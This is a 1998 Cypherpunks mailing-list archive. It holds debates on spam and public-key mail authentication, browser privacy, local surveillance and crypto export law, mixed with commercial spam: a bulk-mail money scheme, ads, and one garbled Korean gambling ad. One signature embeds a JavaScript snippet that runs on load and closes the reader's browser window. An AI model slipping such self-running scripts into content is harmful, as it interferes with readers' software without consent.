Until someone else gets a throw away $10 account and uses it to 
spam, right?  By the time you track'em down, they already gave up
that account.  All ISP's do is to delete the spamming account, which
the spammer doesn't care about anyway.  So you achive nothing.

Further one can generate fake headers and you would not know exactly where
it comes from, though you could have some idea since it would be one of
many sites it was relayed from.  One could send messages from an ISP
that doesn't mind spammers who won't help you track down the bitch that
just slimed your machine, etc.

 
> PK authentication would change nothing.
> 
> Show a single spam with a forged IP address.

IP addresses won't be forged, but one could send
a mail with extra Recieved-By: headers, etc.
 
> PK authentication would only lead us down the
> road of everyone being tattooed with barcodes
> of our own making - and incredibly dumb idea.
> 
> It would be like requiring a smart card for Internet access.

Bullshit.  PK auth with a central repository would be Big Brotherish.
Having each user gen their own PK pair is what I suggested. That
would allow anon users to have persistant (or even throw away)
identities, but prevent Joe Spambitch from telnetting to port 25
and spamming that way.

Even if Joe Spambitch does gen PK pairs and uses them, he can't
gen a pair for every message he sends, the recipient servers won't
recognize his PK pair and might have been instructed to block messages
from bad (and possibly unknown PK's), or at least refuse to relay
messages from unknown PK's.  Relaying is a big problem.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "postmaster" <postmaster@mail.opentown.com>
Date: Fri, 20 Feb 1998 16:41:10 -0800 (PST)
To: opentown@mail.opentown.com
Subject: (Ÿ )" ǰ ġ!
Message-ID: <9802200305.AA21758286@mail.opentown.com>
MIME-Version: 1.0
Content-Type: text/plain


HTTP://WWW.OPENTOWN.COM

ѱ  " "(r) Ÿ1/4  ǰ̺(r) "縦
մϴ.
" 3/4* 1/2ϴ

" : 1998 2 9 ~ 3 10 (12:00 )
"" :  1/4 346 Ǫ ǰ
3/4* : 1/21/2*Ը1/2(r)
ӹ : 1ȸ 30 " *1/4  1/4
ǰ"
   1 : ޿ 1/4(r) 1(100")
   2 : PCS 5
   3 : 56K1/4Ӹ(c) 10
   4 : (r)"1/41/4(r) 10
   5 : ׿(r)"" 20
   6 : MGM"Ĩ 1/4(r) 300(1/2 "뿡1/4 3/4̴ Ĩ
۵)
1/2 ̺(r) : "뿡1/4 "*ο * 1/4 ̺(r) "縦
 Դϴ. 
  1/41/4... 

ִ "*äõ 1/41/2 Դϴ.
 "뿡1/4 Gostop, Slot, Baccarat, Roulette, Drawpoker,
BlacJack 3/4 " " 
"** 1/41/2 Դϴ.  Ư 1/2 Ǫ ǰ *ִ ̺(r)
 αⰡ 
 ʹ"  е  1/2ϴ.   ̶
" (r) 1/41/4 * ܺ1/41/4.
ٸ " ӵ 1/4 ̸  1/4ο Ӹ 1/41/2  
 "1/4ҳ"  ӵ  1/41/2  Դϴ.

Good Luck!

http://www.opentown.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: classic@ix.netcom.com
Date: Fri, 20 Feb 1998 13:48:50 -0800 (PST)
To: research@infoname.com
Subject: A Bit About Your Last Name
Message-ID: <199802201053.EAA01696@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



	Discover Your Family History - Rated "Cool Site of the Week"

		Come visit our website at, http://www.adsilver.com/research/index.html
(if you have problems with the above link, please try http://www.vpm.com/hallofnames/search.htm )
	
        Do you know WHO your ancestors are and WHAT they did?
	Do you know WHEN your surname first appeared?
	Are you curious about WHERE your family roots originate?

Now you can fill in the missing pieces of this puzzle.

Join the satisfied multitudes who have discovered their complete Family Surname History.

All Nationalities. It's easy. Just key your last name into our online index, and in seconds we will tell you it's origin and much MORE.  See if we've researched your complete family name history during our 25 years of professional research.

Read a sample history, plus - FREE Coat of Arms keychain with your family's most ancient coat of arms & crest. All in full color.  Your family name history parchment is 11 x 17",approximately 1700 words. It is beautifully ILLUMINATED by your most ancient Coat of Arms in full authentic Heraldic Colors.  Over 500 URLs on family and heraldic history.

Come visit our website at, http://www.adsilver.com/research/index.html

(if you have problems with the above link, please try http://www.vpm.com/hallofnames/search.htm )


Hall of Names International Inc.
1-888-My-Roots  (1-888-697-6687)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 20 Feb 1998 13:57:41 -0800 (PST)
To: (Recipient list suppressed)
Subject: One Nation birthday raffle
Message-ID: <1.5.4.32.19980219235351.00b3131c@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation Supporter,

We are currently selling tockets for One Nation first birthday raffle.

The first prize is a QANTAS Global Explorer Holiday for two valued at
$12,000 - a 23 day trip visiting Paris, London, New York, Los Angeles,
Anaheim and Honolulu.

The second prize is a 7 day holiday to Hawaii at the Outrigger Reef Hotel
for two - value $5,000.

The third prize is a 7nights stay at the Novotel Palm Cove at Cairns - value
$3,000.

You can order a book of 5 tickets (minimum) at $10 per book (or $2 per
ticket) by credit card by phoning 1800 620088.

Winner's names being drawn at One Nation's Birthday Party at 7pm on April
11th 1998.

Winners will be notified by phone and mail with the results being published
in the Sydney Morning Herald on Friday 17th April 1998.

Order now while tickets remain!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@inexchange.net (Info Desk)
Date: Sat, 21 Feb 1998 16:33:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Advertisement: Website Hosting
Message-ID: <19980220172300666.AGT297@out.inexchange.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www.inexchange.net
info@inexchange.net

InExchange would like to introduce our complete Hosting and Promotional service.

     FOR ONLY $19.95 PER MONTH !

* 20 MB (megabytes) of disk space
* 750 MB  of data transfer per month
* 5 E-mail accounts
* INTERNATIONAL Hosting
* Access to your account anytime via the Web Control Panel
* Full MS Front Page support
* Unlimited FTP updates
* Personal CGI directory for your own scripts (or use ours)
* The best statistics analyzer in the industry
* E-mail forwarding, auto responders and vacation reply
* Domain name registration (www.yourname.com)
* FREE registration of your domain with over 250 search   engines
* Real Audio/Video support

* Inquire about our $16.95 plan

* Other plans also include:
  Shopping cart application and database access/utilities
  Cold Fusion Hosting
  CyberCash, iBill and VersaNet ready
  Instant on-line credit card processing

For additional details, please refer to our website:
http://inexchange.net
info@inexchange.net

Inexchange offers you a full 30 day money back guarantee if not satisfied with our services.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dstoler@globalpac.com (dstoler)
Date: Sat, 21 Feb 1998 05:52:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Request for Web Browser Information
Message-ID: <v03110701b1148b4c60aa@[207.215.173.72]>
MIME-Version: 1.0
Content-Type: text/plain


I would like to know the information my browser makes available to web sites. I use both Netscape and Internet Explorer.

Obviously web sites can determine my IP address for any given session; they can also look at cookies left by themselves and other sites.

Can anyone point me to where I can learn exactly what other information is made available (browser version?, OS version?, system name?, user name?, etc.)?

Thanks in advance.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news@netscape.com
Date: Sat, 21 Feb 1998 06:04:33 -0800 (PST)
Subject: Welcome to Netcenter!
Message-ID: <199802211404.GAA07734@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Netcenter Member, 

Welcome to Netscape Netcenter and congratulations on joining the Internet's best resource for software,
content, commerce, and community. With your free Netcenter registration, you're automatically signed
up for all Netcenter services and sweepstakes. Here's just a sampling of what Netcenter can do for you
every day: 

READ MORE, SURF LESS 
In-Box Direct transforms your email in-box into a customized newsstand, delivering free subscriptions
to over 120 top online publications - from The Wall Street Journal to CNN to Fox Sports - right to your
desktop. 

GET THE LATEST BUZZ 
Business Journal distills news from leading sources and sends you daily personalized briefings on any of
11 industries. 

But this is just the beginning. Netcenter is constantly growing - and we'll send you a free monthly email
newsletter featuring updates on Netcenter programs and introductions to new services. We'll even alert
you to Netcenter members-only specials from our online commerce sites: Marketplace, Software Depot,
and the Netscape Store. 

Visit Netcenter [http://home.netscape.com/netcenter/] again to check out all the services. 

Thanks again for joining the Netcenter community. 

The Netcenter Team 

Please note: Netscape respects your online time and Internet privacy. If you would prefer not to receive
future issues of Netcenter News, please reply to this message with the word "unsubscribe" in the subject
line





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Sat, 21 Feb 1998 04:45:29 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re:  Fwd: Big Brother Sees through walls (from the spyking list)
In-Reply-To: <199802202304.SAA05606@panix2.panix.com>
Message-ID: <Pine.SOL.3.96.980221065336.5774A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Feb 1998, Information Security wrote:

>   >   From: sunder <sunder@brainlink.com>
>   >   
>   >   1)From: "George Martin" <gmartin@kic.or.jp>
>   >   Subject: News Release: High-Tech Surveillance
>   >   
>   >   Here's a sampling of how state and federal agencies are using this
>   >   terrifying technology to spy on Americans:
>   >   
>   >   * In North Carolina, county governments use high-resolution spy satellite
>   >   photographs to search for property improvements that might increase
>   >   property tax assessments.
>
>Was this cost authorized by taxpayers?
>

I have lived in Raleigh, North Carolina my entire life (over 30 yrs).
County governments consist of an elected board of commissioners who have
the power to make such decisions and expenditures without holding public
hearings on these matters.  Unless the local media jumps on one of these
proposals weeks in advance, nobody will even know about it or have an
opportunity to petition for a public hearing.  Once the county
commisioners vote on and approve it, our money is spent and the public has
no recourse (until the next election).  Here in Raleigh, Wake County, NC,
for instance, we have a Republican county commissioner and a board of
members.  When I heard from his daughter, a personal friend, about his
plans to cut funding to drug education and rehab programs and redirect all
of those funds to the county prison system, I decided to act.  I contacted
the commissioner himself, his office, and even had lunch with his wife and
daughter to discuss this issue.  As a family friend, I thought I would at
least be able to get a friendly, receptive ear.  His wife and daughter
were in full agreement with me, but the commissioner dismissed all of my
suggestions and pleas.  In fact, he told me that I was "high on crack" for
even suggesting that he *not* cut spending to drug education and rehab
programs.  i then appealed to the media, the public, and various county
drug rehab and education facilities and tried to petition for public
hearings on the issue.  After getting stonewalled by the GOP-controlled
county board of commissioners, funding to drug rehab and education
programs was cut by over 50%.  Since that time (two years ago), drug
arrests and convictions, violent crime, murder, non-violent crimes,
and admissions to treatment centers have all risen, in all of the basic
statistical measurement categories.

Wake county taxes have increased dramatically (almost 50%), and we have
just completed building a new county jail and several county jail annex
facilities.  In both percentage and numbers, our county jail population is
at the highest rate it has ever been.

On a related note, seven of the Wake county sherriff's deputies, who all
had laptop computers (with Internet access) in their cruisers, were
recently busted for spending all of their time on the clock surfing the
web and going to porno websites and adult chatrooms.  One of the deputies
has been arrested for using a sherriff's department scanner to scan in a
picture of his genitals which he then sent to a young girl, a minor, from
his cruiser while on duty.

Additionally, the officer in charge of the weapons armory for the
sherriff's department, which contains full-auto weapons such as the HK MP5
and the M16, was recently dismissed because it was discovered that he had
been spending all of his time on the clock in another section of the
building surfing adult sites on the web.  Meanwhile, the armory was left
unlocked, deputies were unable to get their weapons serviced within a
reasonable period of time, and an M16 "disappeared".

My tax dollars at work...

>
>No amount of control over the population is enough for the U.S. Government.
>---guy
>

Next...i'll fill you in on some of the more interesting discoveries I made
while working for the NC Dept of Crime Control and Public Safety.  They
don't need satellites to watch you here in Raleigh...they have hi-tech,
hi-res cameras perched on top of all the tallest buildings, in the
projects, at selected street corners, and various other points.

so much for your privacy...

TATTOOMAN

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 07:08:46 -0800 (PST)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <3.0.5.32.19980220184839.008d4b50@popd.ix.netcom.com>
Message-ID: <199802211540.KAA14217@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980220184839.008d4b50@popd.ix.netcom.com>, on 02/20/98 
   at 09:48 PM, Bill Stewart <bill.stewart@pobox.com> said:

>>   at 03:00 AM, Anonymous <anon@anon.efga.org> said:
>>>Use mail readers that don't automatically process HTML and
>>>connect to image servers, accept cookies, or run javascripts.  You are
>>>being watched by tricky defective, er, detective types. es.
>>
>>Several things here:
>>
>At 02:32 AM 2/18/98 -0500, William H. Geiger III wrote:
>>1. HTML in mail:
>>There is just no place for this crap in e-mail. If multipart/alternative
>>is used it is tolarable but pure text/html messages go into the bitbucket
>>with a autoreply explaining to the poster the error of their ways. :)

>HTML is a fine format for email.  It's ASCII readable, and supports
>content description tags that the user's mail reader can render as
>bold/italic/underline/header-levels//color/etc.  It's far superior to
>using bloated undocumented Microsoft Word attachments. 95% of the HTML
>email I get IS spam, but that's a separate problem :-) (After all,
>SPAMMERs like bright colored blinking attention-getting mail.)

Yes but who needs all this crap in e-mail?? E-Mail is a messaging protocol
not a protocol for large documents (HTML is not sutable for large
documents either but that is for another rant).

WARNING: This is the only time you will see me say somthing good about
MickySloth.

I must admit that atleast MS Outlook follows the RFC's and makes use of
multipart/alternative when sending out HTML formated messages so others
are not forced to use a webbrowser to read their mail (unlike Net$cape or
Eudora).

There is no place for HTML in e-mail plain and simple. I do not wan't to
have to load a huge bloated bugfilled webbrowser just to process my e-mail
messages.

>>My recomendations is to dump the Netscape garbage and get a real e-mail
>>client. Netsacpe has done a good job at screwing up the web we really
>>don't need the same favor from them with e-mail.

>Netscape mail is adequate for many people, just as Eudora is. Newer
>versions are pretty bloated, but including S/MIME mail encryption for
>everybody is a Good Thing.

Now this is really scary. You consider pushing weak 40bit S/MIME on the
internet users a GoodThing(TM)? I think you need to sit down and rethink
this one Bill.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>
 
Tag-O-Matic: Have you crashed your Windows today?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO7gPo9Co1n+aLhhAQEE4QQAkukbQzy1Dtw6g/vunMEBZ2o0tLs97lzw
oOAv01R/clFfPEOS64Zk+Yk+EZPg9vp++tLzgpijMOBEz0/pyEnSE3/9mCukhMm/
iQcaUy03eLm6wjK9hDOG04ktS69mVCgK49b9pmPDCdTXJz+MhNBgbenebNGa+97k
eVaA0mNCgcM=
=jjnj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joshua Kunken <jkunken@uclink4.berkeley.edu>
Date: Sat, 21 Feb 1998 10:59:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Request for Web Browser Information
Message-ID: <199802211859.KAA19501@uclink4.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sure, check out:  http://www.autobahn.org/main/addr.shtml

What year is it? 1984? hehhehe

Lates...

At 05:51 AM 2/21/98 -0800, you wrote:
>I would like to know the information my browser makes available to web
sites. I use both Netscape and Internet Explorer.
>
>Obviously web sites can determine my IP address for any given session;
they can also look at cookies left by themselves and other sites.
>
>Can anyone point me to where I can learn exactly what other information is
made available (browser version?, OS version?, system name?, user name?,
etc.)?
>
>Thanks in advance.
>
>David
> 

Joshua Kunken
Administrative Computing
jkunken@uclink4.berkeley.edu

"100% uptime? You betcha!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 21 Feb 1998 18:41:25 -0800 (PST)
To: Anonymous <cryptography@c2.net
Subject: Re: US law on re-exporting crypto software?
Message-ID: <199802220239.SAA21614@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


    --
At 06:49 PM 2/19/98 -0500, Anonymous wrote:
> An article in the current issue of the German journal 
> `Datenschutz und Datensicherheit' claims that exporting 
> crypto software from anywhere outside the US to a third 
> country violates US law if the software contains (only 
> marginal amounts of) US-developed code, such as a C  
> standard library, and that anyone distributing crypto 
> software that has been compiled with an American compiler 
> had better not visit the United States.  Is that true?

No one knows what the laws on cryptography in the US are, 
least of all the courts or the lawyers.

There is a law against exporting armaments, or indeed doing 
diddly squat with armaments, and the bureaucrats have decreed 
crypto an armament, however they have displayed profound 
reluctance to take this issue to court, so the implications 
of such a law, and such a definition remain entirely unknown.

However since no one has yet been actually indicted, it is 
unlikely that you will be the first.  

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     MukYGG/TcTpm9PDncEpXfT4BfC8t7mVXt7WWsJtm
     42je0WMVidgZLmeFqZcxiIvUBWPKVWWUER4SS70Ko
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fnorky@geocities.com (Douglas L. Peterson)
Date: Sat, 21 Feb 1998 10:59:32 -0800 (PST)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: Fwd: Big Brother Sees through walls (from the spyking list)
In-Reply-To: <Pine.SOL.3.96.980221065336.5774A-100000@c00954-100lez.eos.ncsu.edu>
Message-ID: <34f12039.131228245@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Feb 1998 07:45:20 -0500 (EST), you wrote:

>
>On Fri, 20 Feb 1998, Information Security wrote:
>
>>   >   From: sunder <sunder@brainlink.com>
>>   >   
>>   >   1)From: "George Martin" <gmartin@kic.or.jp>
>>   >   Subject: News Release: High-Tech Surveillance
>>   >   
>>   >   Here's a sampling of how state and federal agencies are using this
>>   >   terrifying technology to spy on Americans:
>>   >   
>>   >   * In North Carolina, county governments use high-resolution spy satellite
>>   >   photographs to search for property improvements that might increase
>>   >   property tax assessments.
>>
>>Was this cost authorized by taxpayers?
>>
>
>I have lived in Raleigh, North Carolina my entire life (over 30 yrs).
>County governments consist of an elected board of commissioners who have
>the power to make such decisions and expenditures without holding public
>hearings on these matters.  Unless the local media jumps on one of these
>proposals weeks in advance, nobody will even know about it or have an
>opportunity to petition for a public hearing.  Once the county
>commisioners vote on and approve it, our money is spent and the public has
>no recourse (until the next election).  Here in Raleigh, Wake County, NC,
>for instance, we have a Republican county commissioner and a board of
>members.  When I heard from his daughter, a personal friend, about his
>plans to cut funding to drug education and rehab programs and redirect all
>of those funds to the county prison system, I decided to act.  I contacted
>the commissioner himself, his office, and even had lunch with his wife and
>daughter to discuss this issue.  As a family friend, I thought I would at
>least be able to get a friendly, receptive ear.  His wife and daughter
>were in full agreement with me, but the commissioner dismissed all of my
>suggestions and pleas.  In fact, he told me that I was "high on crack" for
>even suggesting that he *not* cut spending to drug education and rehab
>programs.  i then appealed to the media, the public, and various county
>drug rehab and education facilities and tried to petition for public
>hearings on the issue.  After getting stonewalled by the GOP-controlled
>county board of commissioners, funding to drug rehab and education
>programs was cut by over 50%.  Since that time (two years ago), drug
>arrests and convictions, violent crime, murder, non-violent crimes,
>and admissions to treatment centers have all risen, in all of the basic
>statistical measurement categories.
>
>Wake county taxes have increased dramatically (almost 50%), and we have
>just completed building a new county jail and several county jail annex
>facilities.  In both percentage and numbers, our county jail population is
>at the highest rate it has ever been.
>
>On a related note, seven of the Wake county sherriff's deputies, who all
>had laptop computers (with Internet access) in their cruisers, were
>recently busted for spending all of their time on the clock surfing the
>web and going to porno websites and adult chatrooms.  One of the deputies
>has been arrested for using a sherriff's department scanner to scan in a
>picture of his genitals which he then sent to a young girl, a minor, from
>his cruiser while on duty.
>
>Additionally, the officer in charge of the weapons armory for the
>sherriff's department, which contains full-auto weapons such as the HK MP5
>and the M16, was recently dismissed because it was discovered that he had
>been spending all of his time on the clock in another section of the
>building surfing adult sites on the web.  Meanwhile, the armory was left
>unlocked, deputies were unable to get their weapons serviced within a
>reasonable period of time, and an M16 "disappeared".
>
>My tax dollars at work...

May I suggest trying what we did here in Colorado.  Take a look at our
Taxpayers Bill of Rights.  No government in Colorado (state, county or
local) can raise taxes without putting the measure before the public
for a vote.  We have, for the time being, tied the hands of the
government.  They can't just spend money and expect to raise taxes to
cover the short fall.

It took 5 state wide elections to amend the constitution, but the
public finely wised up.  Each election, the State would promise to
change their spending habits.  They broke that promise every time,
once within days of the election.

We have also, on a few occasions, amended our state constitution to
force the government to fund specific items (Education for one) before
any other items may be funded.

If your North Carolina allows the public to patition to have a measure
put before the public in an election, try doing it.  It's not perfect,
but it might send a clear message to the government.

-Doug

p.s.
  Please forgive the grammar errors.  I suffer from using a Microsoft
spelling checker that likes to change the meaning of my words.
-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fnorky@geocities.com (Douglas L. Peterson)
Date: Sat, 21 Feb 1998 11:06:39 -0800 (PST)
To: ulf@fitug.de (Ulf Mller)
Subject: Re: "carefully monitor the Internet"
In-Reply-To: <m0y5wOj-0003bcC@ulf.mali.sub.org>
Message-ID: <34f223bb.132126550@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Feb 1998 18:38:04 +0100 (GMT+0100), you wrote:

>
>   To keep pace with the fast-moving money launders, FAFT said it would
>   carefully monitor the Internet and so-called electronic purse systems,
>   whereby cash is passed from person to person via electronic chips,
>   leaving no audit trail in its wake.
>
>http://www.yahoo.com/headlines/980212/wired/stories/money_2.html
>http://www.oecd.org/fatf/

Hmm, lets see.  I login using secure shell.  Now I start a SSL session
to someplace where I want to exchange money.  Next I use e-cash.  The
monitor will see encrypted garbage.

Quick, kick in the door.  He is using encryption!  Must be money
launders!

-Doug


-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Sat, 21 Feb 1998 19:56:40 -0800 (PST)
To: dstoler <dstoler@globalpac.com>
Subject: Re: Request for Web Browser Information
In-Reply-To: <v03110701b1148b4c60aa@[207.215.173.72]>
Message-ID: <Pine.SOL.3.96.980221225230.22398G-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Feb 1998, dstoler wrote:

>I would like to know the information my browser makes available to web sites. I use both Netscape and Internet Explorer.
>
>Obviously web sites can determine my IP address for any given session; they can also look at cookies left by themselves and other sites.
>
>Can anyone point me to where I can learn exactly what other information is made available (browser version?, OS version?, system name?, user name?, etc.)?
>
>Thanks in advance.
>
>David
>
>
>

check these out...

Your Environmental Variables
http://152.7.11.38/~tattooman/variable.cgi

Your Privacy Online
http://www4.ncsu.edu/~jkwilli2/browserscript.html

So Much for your Privacy...
http://www4.ncsu.edu/~jkwilli2/main/NO_Privacy.html


if you want copies of any of these scripts and snippets, then feel free to
grab them off of my ftp server at
ftp://152.7.11.38/pub/personal/tattooman/
check in the "javascript", "java" and "code" subdirectories.

email me if you have any questions, comments, etc...

regards,

TATTOOMAN

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kmiller@aol.com
Date: Sun, 22 Feb 1998 00:52:37 -0800 (PST)
To: customer@isp.com
Subject: $:)$
Message-ID: <97269476_54455892>
MIME-Version: 1.0
Content-Type: text/plain



WARNING: THIS IS REAL !!
Pass This Up Lightly And You'll Be Making
One Of The Biggest Mistakes Of Your Life!

----FREE----FREE----FREE----FREE----
REGISTERED version of NetContact
     Retails for $300 and up
This bulk E-mail software will EXPLODE your business
----FREE----FREE----FREE----FREE----

ALL I DO IS MAIL OUT 10 OF THE EXACT SAME SALES
LETTER EVERYDAY !!

That is all I do! I earn $140,  $200, even $250 a day mailing out
the exact same sales letter! There is absolutely no catch or crazy
gimmick involved here, I promise you. This has nothing to do with
any ridiculous  envelope stuffing program, illegal chain-letter scam
or worthless multi-level scheme!

There is not an easier way to make $140 a day than this- if you
would like to gain financial independence and success, listen up...

I tried every moneymaking plan under the sun. After a couple years
of constant attempts at striking it rich, I had done nothing but
strike out.

I tried multi-level marketing... I failed!
I tried chain letters... They failed me!
I tried envelope stuffing... What a joke!

I figured I could afford the $30 or $40 for each of the programs I
tried; until I realized not only does that build up, but I was making
no money in the mean time. Bills piled up and the future started
looking bleak.

Luckily a friend informed me of this program, which turned my
finances around. Not only is it profitable, but immensely profitable
with only an hour or two a day worth of work!

Here is what my 3 diskette program includes:

1) NetContact bulk mail software- REGISTERED
2) Master copies of my Special Sales Letters that
     make $140 per day
3)Complete business startup guides
4)Complete instructions and internet access to our secret website

As you can see, for only $20, you are getting a complete business
system with all the support you need! In the past I have licensed
this system for $79.95. Available only for Windows95 and NT.

cut here____________________________________________

I want to receive $140 every time I mail out 10 copies of the
same sales letter that you will supply. Please rush me your
Every-Day Cash Plan!! Enclosed is the $20 dollar cost.

Send $20 cash or check to: 	HyperReal
				Box 136
				2051 Richmond Road Suite 125
				Lexington, KY 40502

Make checks payable to HyperReal
				
				
Name_________________________________________________

Address_______________________________________________

City__________________________________________________

State/Province______________ Zip/Postal code_______________

Country if other than U.S._________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MikeF@sbbsonline.com
Date: Sun, 22 Feb 1998 06:02:26 -0800 (PST)
To: MikeF@sbbsonline.com
Subject: Your WEB Site should pay you...
Message-ID: <2077628_24777421>
MIME-Version: 1.0
Content-Type: text/plain



Should you have your business on the WEB?

Introducing:

The WEB Site that pays YOU!


You know the old story.  Your ISP promises a free WEB site.  You try a personal site and then a great idea comes to you.  I can put my business on the WEB!  But then the story changes.  For commercial use, your ISP wants to charge you a monthly fee.  Well, that's OK, you think.  But then for a commercial site that represents your business, you want something flashy and professional looking.  Don't know how?  Never fear - your friendly ISP will be happy to do it for you for a BIG PRICE!  Then, every time you want to change something, more money to pay out!

People often pay out anywhere from $50 to  $thousands to have a WEB site designed for them because they don't know how to do it themselves.  They then pay $30 to $100 per month for the ISP to " host" or "maintain" their WEB page.  They then get nickled and dimed to death for changes to their own page!

We can change all that.  We have professional WEB pages that you don't pay a fortune for.  They can be made with simple to use, professionally designed templates, that a 6th grader could use!  You don't pay a monthly "hosting" fee, you change the messages, graphics, or even the whole look of the site ANYTIME you want, easily, and with no charges.  If you want to get fancier, you can, with a direct edit mode.

And best of all, this WEB site (with up to 100 pages for YOUR business) PAYS YOU!

This WEB site takes the "value added" concept to the internet.  Your WEB Site, that promotes YOUR business, is actually a store front to one of the internet's fastest growing virtual malls.  When people enter the mall through your storefront and make purchases through their secure payment system, the mall pays YOU a commission.

For more information, send  E-MAIL to     mikef@sbbsonline.com     with just the word     "webinfo" (without the quotes) in the subject line  or visit us at:

http://www.wimall.com/skyshop

Remember,  99% of all Internet Sites on the Web are just that...SITES!. This website is the first to make money for EVERY owner!

If this message offends you, please pardon the intrusion - if you would kindly reply to this message with just the word "remove" in the subject line, you will automatically be removed from this database.

Thank you for your time...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Feb 1998 09:49:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: CIA Blasts Bay of Pigs Op
Message-ID: <1.5.4.32.19980222175049.006808d4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NY Times reports today that the National Security Archive 
has obtained under FOIA the sole remaining copy of the
CIA's 1962 Top Secret survey of the Bay of Pigs disaster. 
The highly critical document is termed one of the most secret 
documents of the cold war. We've put a copy of the article at:

   http://jya.com/cia-pigs.htm

The full declassified docs are at:

   http://www.seas.gwu.edu/nsarchive

They are entirely in JPG images, over 400 of them. We're
transcribing to ASCII but it will take a day or two.







